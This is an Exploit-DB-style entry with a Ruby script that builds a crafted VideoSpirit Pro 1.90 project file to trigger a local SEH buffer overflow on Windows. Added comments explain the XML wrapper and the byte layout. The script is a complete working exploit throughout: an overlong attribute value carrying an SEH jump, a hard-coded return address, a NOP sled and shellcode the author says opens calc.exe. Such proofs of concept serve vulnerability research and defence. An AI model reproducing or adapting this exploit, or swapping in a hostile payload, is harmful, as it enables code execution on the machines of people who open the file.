VideoSpirit Pro 1.90 - Local Buffer Overflow (SEH)

EDB-ID:

29547

CVE:



Author:

metacom

Type:

local


Platform:

Windows

Date:

2013-11-12


#!/usr/bin/ruby
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
#
# Proof-of-concept generator for the crash described in the page title.
# The script does no network or process activity: its only side effect is
# writing "Exploit.visprj" (a VideoSpirit Pro project file) into the current
# directory.  The file's XML is valid except for the value attribute of the
# <valitem name="mp3" ...> element, which is filled with the overlong
# `junk` buffer below.  For defenders this is the reproduction artefact:
# a .visprj file carrying an attribute value several KB long is the
# observable indicator, and the file-write below is all the generator does.
#
# Ruby has no triple-quoted string literal: `'''` parses as an empty string
# followed by a single-quoted string (adjacent literals concatenate), so the
# banner prints as intended.
print '''
        
		VideoSpirit Pro Seh Buffer Overflow
		Version: Pro 1.90
		Date found: 11.11.2013
		Exploit Author: metacom
		Tested on: Win7-Win8-WinXp-Sp3-EN
'''
sleep(3)
# `head` is the leading part of the project file, hex-escaped plain ASCII.
# Decoded it reads (whitespace abbreviated):
#   <version value="3" />
#   <track> <type value="0" /> ... <type value="7" /> </track>
#   <track0 /> ... <track4 />  <clip />
#   <output typename="AVI" keepaspect="0" presetquality="0">
#     <type0 enable="1"> <valitem name="msmpeg4v2" .../> ... </type0>
#     <type1 enable="1"> <valitem name="mp3" value="
# i.e. it stops inside the opening quote of the mp3 value attribute.
head=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
# `junk` is the oversized attribute value.  Its layout is fixed by the
# repeat counts in the lines below: 104 filler bytes, then 4 bytes the author
# labels "jump", then a 4-byte hard-coded address the author labels
# "POP EDI", then 80 NOP bytes ("landing zone"), then the shellcode, then
# 4500 bytes of 0xCC padding.  The address is a constant, so the technique
# presumably depends on the containing module loading at a fixed base on the
# tested systems — not verifiable from this file.
junk="\x41" * 104
junk+="\xeb\x0c\xff\xff" # jump
junk+=[0x10113FD3].pack('V')# 10113FD3   5F  POP EDI   (packed little-endian)
junk+="\x90" * 80 # landing zone
# Shellcode bytes are opaque here; the author's comments say it starts
# calc.exe and lists the byte values it avoids.  Those values include
# 0x0a (newline), 0x22 (") and 0x26 (&), which is consistent with the payload
# sitting inside an XML attribute value — presumably why they are excluded.
junk+=("\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"+
"\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd"+
"\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43"+
"\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0"+
"\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f"+ # Calc Shellcode
"\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40"+ # Bad Characters
"\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c"+ # \x00\x0a\x0d\x1a\x21\x22\x26
"\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e"+
"\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19"+
"\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33"+
"\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90"+
"\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee"+
"\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7"+
"\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56"+
"\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2"+
"\x99\x03")
junk+="\xCC" * 4500 # padding; 0xCC is the x86 int3 opcode, so a debugger would break here
# `footer` closes the attribute and the remaining XML.  Decoded:
#   " />
#         <valitem name="128k" value="128k" />
#         <valitem name="44100" value="44100" />
#         <valitem name="2 (Stereo)" value="2" />
#     </type1>
#     <type2 enable="0" />
#   </output>
footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
# Full file image: valid XML prefix, oversized attribute value, valid suffix.
off= head + junk + footer
print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
# Binary mode ("wb") keeps the bytes as-is; on Windows this also prevents
# the 0x0A bytes in the XML from being rewritten as CR LF.
File.open("Exploit.visprj","wb") do |f| 
f.write off
# Redundant: the block form of File.open closes the handle when the block
# returns.
f.close
print "\t\t[+]File Exploit.visprj create successfully.\n"
sleep(1)
end
# Bare rescue catches StandardError (e.g. a permission error on the write);
# $! is the exception that was raised.
rescue
print "**[-]Error: #{$!}\n"
# NOTE(review): exit(0) reports success to the calling shell even though the
# file was not written; a non-zero status would be the conventional choice.
exit(0)
end